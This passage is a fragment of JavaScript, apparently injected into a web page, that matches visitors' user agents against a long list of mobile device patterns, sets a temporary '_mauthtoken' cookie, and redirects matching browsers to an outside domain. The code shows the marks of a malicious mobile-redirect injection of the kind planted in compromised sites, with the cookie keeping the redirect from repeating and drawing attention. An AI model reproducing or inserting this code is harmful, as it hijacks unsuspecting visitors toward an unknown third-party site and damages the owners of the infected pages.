|_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}